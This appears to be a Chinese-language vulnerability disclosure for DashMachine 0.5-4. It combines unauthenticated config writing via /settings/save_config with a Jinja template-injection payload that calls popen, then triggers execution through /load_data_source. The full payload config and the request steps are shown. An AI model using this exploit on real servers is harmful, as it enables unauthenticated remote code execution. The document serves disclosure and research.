项目链接

rmountjoy92/DashMachine: Another web application bookmark dashboard, with fun features. (github.com)

影响版本

0.5-4 docker

漏洞过程

DashMachine配置data source时支持使用Jinja模板语法,写入恶意语句可造成RCE;同时DashMachine存在访问控制漏洞,攻击者可在未登录情况下写入配置。

构造恶意配置信息:

[Settings]
theme = light
accent = orange
background = None
roles = admin,user,public_user
home_access_groups = admin_only
settings_access_groups = admin_only
custom_app_title = DashMachi
sidebar_default = open

[admin]
role = admin
password = 
confirm_password = 

[variable_name]
platform = curl
resource = <http://example.com>
value_template = {{"".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('id').read()}}{{value}}
response_type = plain

在未登录的情况下,通过”/settings/save_config”保存这个恶意配置:

Untitled

DashMachine响应”success”,id值为1。

无需登录,访问“/load_data_source?id=1”,参数id的值与以上响应相同:

Untitled

DashMachine的响应内容中包含恶意代码执行的结果